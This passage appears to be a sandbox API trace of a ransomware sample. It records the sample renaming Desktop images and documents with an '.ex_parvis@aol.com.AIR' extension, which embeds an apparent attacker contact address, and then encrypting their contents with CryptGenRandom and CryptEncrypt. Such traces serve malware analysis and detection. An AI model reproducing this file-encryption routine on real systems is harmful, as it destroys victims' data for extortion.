nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.853] WriteFile (in: hFile=0x398, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.853] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xbcd3) returned 0x3ac410 [0160.853] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xbcd3) returned 0x3b80f0 [0160.854] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.854] ReadFile (in: hFile=0x398, lpBuffer=0x3ac410, nNumberOfBytesToRead=0xbcd3, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ac410*, lpNumberOfBytesRead=0x2acf9c8*=0xbcd3, lpOverlapped=0x0) returned 1 [0160.854] SetFilePointer (in: hFile=0x398, lDistanceToMove=-48339, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.854] WriteFile (in: hFile=0x398, lpBuffer=0x3b80f0*, nNumberOfBytesToWrite=0xbcd3, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b80f0*, lpNumberOfBytesWritten=0x2acf9c8*=0xbcd3, lpOverlapped=0x0) returned 1 [0160.855] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0160.855] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0160.855] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bq1hwoT7i-_R.png", dwFileAttributes=0x80) returned 1 [0160.855] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bq1hwoT7i-_R.png") returned 55 [0160.855] GetProcessHeap () returned 0x2e0000 [0160.855] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd4) returned 0x319d30 [0160.855] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bq1hwoT7i-_R.png" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bq1hwoT7i-_R.png") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bq1hwoT7i-_R.png" [0160.855] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bq1hwoT7i-_R.png", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bq1hwoT7i-_R.png.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bq1hwoT7i-_R.png.12781717671972518758.ex_parvis@aol.com.AIR" [0160.855] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bq1hwoT7i-_R.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bq1hwot7i-_r.png"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bq1hwoT7i-_R.png.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bq1hwot7i-_r.png.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.859] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Bq1hwoT7i-_R.png.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bq1hwot7i-_r.png.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x398 [0160.859] GetProcessHeap () returned 0x2e0000 [0160.859] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0160.859] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=67878) returned 1 [0160.859] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x10926 [0160.859] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.859] GetProcessHeap () returned 0x2e0000 [0160.859] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0160.859] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.859] WriteFile (in: hFile=0x398, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.860] WriteFile (in: hFile=0x398, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.860] WriteFile (in: hFile=0x398, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.860] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10926) returned 0x3ac410 [0160.860] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10926) returned 0x30d0048 [0160.861] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.861] ReadFile (in: hFile=0x398, lpBuffer=0x3ac410, nNumberOfBytesToRead=0x10926, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ac410*, lpNumberOfBytesRead=0x2acf9c8*=0x10926, lpOverlapped=0x0) returned 1 [0160.863] SetFilePointer (in: hFile=0x398, lDistanceToMove=-67878, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.863] WriteFile (in: hFile=0x398, lpBuffer=0x30d0048*, nNumberOfBytesToWrite=0x10926, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0048*, lpNumberOfBytesWritten=0x2acf9c8*=0x10926, lpOverlapped=0x0) returned 1 [0160.863] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0160.863] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0160.863] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\b2yfC0.png", dwFileAttributes=0x80) returned 1 [0160.864] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\b2yfC0.png") returned 49 [0160.864] GetProcessHeap () returned 0x2e0000 [0160.864] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc8) returned 0x319d30 [0160.864] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\b2yfC0.png" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\b2yfC0.png") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\b2yfC0.png" [0160.864] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\b2yfC0.png", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\b2yfC0.png.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\b2yfC0.png.12781717671972518758.ex_parvis@aol.com.AIR" [0160.864] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\b2yfC0.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\b2yfc0.png"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\b2yfC0.png.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\b2yfc0.png.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.866] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\b2yfC0.png.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\b2yfc0.png.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x398 [0160.867] GetProcessHeap () returned 0x2e0000 [0160.867] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0160.867] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=84462) returned 1 [0160.867] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x149ee [0160.867] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.867] GetProcessHeap () returned 0x2e0000 [0160.867] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0160.867] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.867] WriteFile (in: hFile=0x398, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.868] WriteFile (in: hFile=0x398, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.868] WriteFile (in: hFile=0x398, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.868] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x149ee) returned 0x3ac410 [0160.868] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x149ee) returned 0x30d0048 [0160.868] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.868] ReadFile (in: hFile=0x398, lpBuffer=0x3ac410, nNumberOfBytesToRead=0x149ee, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ac410*, lpNumberOfBytesRead=0x2acf9c8*=0x149ee, lpOverlapped=0x0) returned 1 [0160.869] SetFilePointer (in: hFile=0x398, lDistanceToMove=-84462, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.869] WriteFile (in: hFile=0x398, lpBuffer=0x30d0048*, nNumberOfBytesToWrite=0x149ee, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0048*, lpNumberOfBytesWritten=0x2acf9c8*=0x149ee, lpOverlapped=0x0) returned 1 [0160.871] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0160.871] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0160.871] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A12aHFjeVeGeS7x7ByFN.png", dwFileAttributes=0x80) returned 1 [0160.871] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A12aHFjeVeGeS7x7ByFN.png") returned 63 [0160.871] GetProcessHeap () returned 0x2e0000 [0160.871] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe4) returned 0x3a7428 [0160.871] lstrcpyW (in: lpString1=0x3a7428, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A12aHFjeVeGeS7x7ByFN.png" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A12aHFjeVeGeS7x7ByFN.png") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A12aHFjeVeGeS7x7ByFN.png" [0160.871] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A12aHFjeVeGeS7x7ByFN.png", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A12aHFjeVeGeS7x7ByFN.png.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A12aHFjeVeGeS7x7ByFN.png.12781717671972518758.ex_parvis@aol.com.AIR" [0160.871] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A12aHFjeVeGeS7x7ByFN.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\a12ahfjeveges7x7byfn.png"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A12aHFjeVeGeS7x7ByFN.png.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\a12ahfjeveges7x7byfn.png.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.875] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\A12aHFjeVeGeS7x7ByFN.png.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\a12ahfjeveges7x7byfn.png.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x398 [0160.875] GetProcessHeap () returned 0x2e0000 [0160.875] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7428 | out: hHeap=0x2e0000) returned 1 [0160.875] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=9163) returned 1 [0160.875] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x23cb [0160.875] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.875] GetProcessHeap () returned 0x2e0000 [0160.875] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0160.875] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.875] WriteFile (in: hFile=0x398, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.876] WriteFile (in: hFile=0x398, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.876] WriteFile (in: hFile=0x398, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.876] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x23cb) returned 0x3ac410 [0160.877] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x23cb) returned 0x3ae7e8 [0160.877] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.877] ReadFile (in: hFile=0x398, lpBuffer=0x3ac410, nNumberOfBytesToRead=0x23cb, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ac410*, lpNumberOfBytesRead=0x2acf9c8*=0x23cb, lpOverlapped=0x0) returned 1 [0160.877] SetFilePointer (in: hFile=0x398, lDistanceToMove=-9163, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.877] WriteFile (in: hFile=0x398, lpBuffer=0x3ae7e8*, nNumberOfBytesToWrite=0x23cb, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ae7e8*, lpNumberOfBytesWritten=0x2acf9c8*=0x23cb, lpOverlapped=0x0) returned 1 [0160.878] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0160.878] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0160.878] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3hM4FAO95hmZLUgSSV.gif", dwFileAttributes=0x80) returned 1 [0160.878] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3hM4FAO95hmZLUgSSV.gif") returned 61 [0160.878] GetProcessHeap () returned 0x2e0000 [0160.878] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe0) returned 0x319d30 [0160.878] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3hM4FAO95hmZLUgSSV.gif" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3hM4FAO95hmZLUgSSV.gif") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3hM4FAO95hmZLUgSSV.gif" [0160.878] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3hM4FAO95hmZLUgSSV.gif", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3hM4FAO95hmZLUgSSV.gif.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3hM4FAO95hmZLUgSSV.gif.12781717671972518758.ex_parvis@aol.com.AIR" [0160.878] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3hM4FAO95hmZLUgSSV.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3hm4fao95hmzlugssv.gif"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3hM4FAO95hmZLUgSSV.gif.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3hm4fao95hmzlugssv.gif.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.881] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3hM4FAO95hmZLUgSSV.gif.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3hm4fao95hmzlugssv.gif.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x398 [0160.881] GetProcessHeap () returned 0x2e0000 [0160.881] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0160.881] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=71207) returned 1 [0160.881] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x11627 [0160.881] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.881] GetProcessHeap () returned 0x2e0000 [0160.881] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0160.881] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.881] WriteFile (in: hFile=0x398, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.882] WriteFile (in: hFile=0x398, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.882] WriteFile (in: hFile=0x398, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.882] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x11627) returned 0x3ac410 [0160.882] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x11627) returned 0x30d0048 [0160.882] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.882] ReadFile (in: hFile=0x398, lpBuffer=0x3ac410, nNumberOfBytesToRead=0x11627, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ac410*, lpNumberOfBytesRead=0x2acf9c8*=0x11627, lpOverlapped=0x0) returned 1 [0160.883] SetFilePointer (in: hFile=0x398, lDistanceToMove=-71207, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.883] WriteFile (in: hFile=0x398, lpBuffer=0x30d0048*, nNumberOfBytesToWrite=0x11627, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0048*, lpNumberOfBytesWritten=0x2acf9c8*=0x11627, lpOverlapped=0x0) returned 1 [0160.885] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0160.885] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0160.885] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\39yFmucDocy S9Nua.rtf", dwFileAttributes=0x80) returned 1 [0160.892] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\39yFmucDocy S9Nua.rtf") returned 60 [0160.892] GetProcessHeap () returned 0x2e0000 [0160.892] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xde) returned 0x319d30 [0160.892] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\39yFmucDocy S9Nua.rtf" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\39yFmucDocy S9Nua.rtf") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\39yFmucDocy S9Nua.rtf" [0160.892] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\39yFmucDocy S9Nua.rtf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\39yFmucDocy S9Nua.rtf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\39yFmucDocy S9Nua.rtf.12781717671972518758.ex_parvis@aol.com.AIR" [0160.892] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\39yFmucDocy S9Nua.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\39yfmucdocy s9nua.rtf"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\39yFmucDocy S9Nua.rtf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\39yfmucdocy s9nua.rtf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.896] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\39yFmucDocy S9Nua.rtf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\39yfmucdocy s9nua.rtf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x398 [0160.896] GetProcessHeap () returned 0x2e0000 [0160.896] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0160.896] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1173) returned 1 [0160.896] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, 